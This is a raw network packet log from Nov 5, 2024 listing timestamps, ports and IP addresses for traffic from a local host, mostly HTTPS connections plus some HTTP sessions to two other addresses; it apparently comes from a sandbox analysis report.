Nov 5, 2024 18:46:05.117695093 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.121279001 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.121284008 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.218935966 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.219168901 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.222780943 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.245099068 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.245248079 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.245326996 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.265506029 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.265517950 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.265527964 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.265537024 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.266808987 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.266822100 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.266830921 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.266835928 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.270627975 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.270668983 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.270741940 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.270951033 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.270962954 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.278665066 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.278678894 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.278749943 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.278909922 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.278923988 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.340121984 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.359878063 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.359895945 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.360311031 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.360315084 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.398818016 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.402930021 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.402951956 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.403386116 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.403393030 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.487904072 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.488002062 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.488099098 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.488373041 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.488383055 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.488405943 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.488409996 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.491506100 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.491548061 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.491616011 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.491758108 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.491769075 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.532978058 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.533061981 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.533206940 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.533565998 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.533577919 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.533587933 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.533593893 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.538320065 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.538336992 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.538414001 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.538764954 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.538777113 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.556667089 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.557135105 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.557153940 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.557641029 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.557646990 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.686392069 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.686491013 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.686547041 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.686722994 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.686736107 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.686745882 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.686749935 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.689462900 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.689480066 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.689574003 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.689709902 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.689722061 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.925786972 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:05.926119089 CET	49798	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:05.931695938 CET	80	49798	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:05.931786060 CET	49798	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:05.931911945 CET	49798	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:05.938687086 CET	80	49798	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:05.946990967 CET	80	49786	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:05.947060108 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:06.019587994 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.020015955 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.020023108 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.020462990 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.020467043 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.050540924 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.051008940 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.051038980 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.051541090 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.051546097 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.153747082 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.153794050 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.153888941 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.154055119 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.154059887 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.154093027 CET	49794	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.154097080 CET	443	49794	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.156615019 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.156634092 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.156709909 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.156842947 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.156855106 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.181845903 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.181986094 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.182060003 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.182126999 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.182143927 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.182152987 CET	49793	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.182157993 CET	443	49793	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.184441090 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.184470892 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.184542894 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.184672117 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.184686899 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.224073887 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.234658957 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.234678030 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.235097885 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.235101938 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.271616936 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.272038937 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.272048950 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.272480965 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.272485971 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.360615015 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.360678911 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.360727072 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.360872030 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.360887051 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.360897064 CET	49795	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.360901117 CET	443	49795	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.363816023 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.363862038 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.363944054 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.364100933 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.364115000 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.401819944 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.401890993 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.401947975 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.402132988 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.402143002 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.402151108 CET	49796	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.402157068 CET	443	49796	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.404597998 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.404628038 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.404700994 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.404827118 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.404839993 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.433674097 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.437762976 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.437778950 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.438198090 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.438205957 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.578893900 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.579016924 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.579075098 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.579483986 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.579483986 CET	49797	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.579494953 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.579503059 CET	443	49797	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.594559908 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.594603062 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.594705105 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.595032930 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.595046043 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.857815027 CET	80	49798	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:06.861382961 CET	49798	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:06.864681005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:06.869755030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:06.873155117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:06.873280048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:06.878371954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:06.888825893 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.889606953 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.889621019 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.890120983 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.890125036 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.930064917 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.931030035 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.931042910 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:06.931587934 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:06.931595087 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.018903017 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.019064903 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.019130945 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.019320011 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.019330978 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.019341946 CET	49799	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.019346952 CET	443	49799	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.021723986 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.021784067 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.021883011 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.022007942 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.022025108 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.068898916 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.069166899 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.073340893 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.073378086 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.073390961 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.073401928 CET	49800	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.073405981 CET	443	49800	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.075689077 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.075721979 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.075817108 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.075930119 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.075938940 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.112864971 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.113570929 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.113593102 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.113971949 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.113976955 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.136497974 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.136940956 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.136950016 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.137454987 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.137459993 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.267611027 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.267678976 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.267879963 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.267973900 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.267981052 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.267990112 CET	49802	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.267992973 CET	443	49802	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.278975010 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.279048920 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.279150963 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.279309988 CET	49807	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.279335022 CET	443	49807	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.286036015 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.286283016 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.286351919 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.286493063 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.286511898 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.286521912 CET	49801	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.286526918 CET	443	49801	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.288479090 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.288501978 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.288593054 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.288836956 CET	49808	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.288849115 CET	443	49808	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.340861082 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.341658115 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.341679096 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.342099905 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.342103958 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.474947929 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.475101948 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.475260019 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477493048 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477493048 CET	49803	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477516890 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.477525949 CET	443	49803	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.477683067 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477706909 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.477785110 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477897882 CET	49809	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.477910995 CET	443	49809	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.746697903 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.747106075 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.747160912 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.747553110 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.747561932 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.775578976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775618076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775635004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775661945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775693893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775712013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775724888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775734901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775737047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775748968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775758028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775769949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775799990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775830984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775841951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775852919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.775878906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775902033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.775902033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.780635118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.780718088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.780848980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.780896902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.780905008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.780915976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.780951977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.812145948 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.812699080 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.812721014 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.813090086 CET	49806	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.813095093 CET	443	49806	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.876554012 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.876600981 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.876657009 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.876843929 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.876868963 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.876882076 CET	49805	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.876888990 CET	443	49805	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.879694939 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.879734039 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.879797935 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.879933119 CET	49810	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:07.879945993 CET	443	49810	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:07.918698072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.918778896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.918873072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.918917894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919177055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919195890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919210911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919219971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919220924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919229984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919234991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919253111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919294119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919584036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919595003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919605017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.919636011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.919651985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920042992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920061111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920073032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920084000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920089006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920094967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920104027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920110941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:07.920130014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920145988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:07.920916080 CET	80	49804	31.41.244.11	192.168.2.4
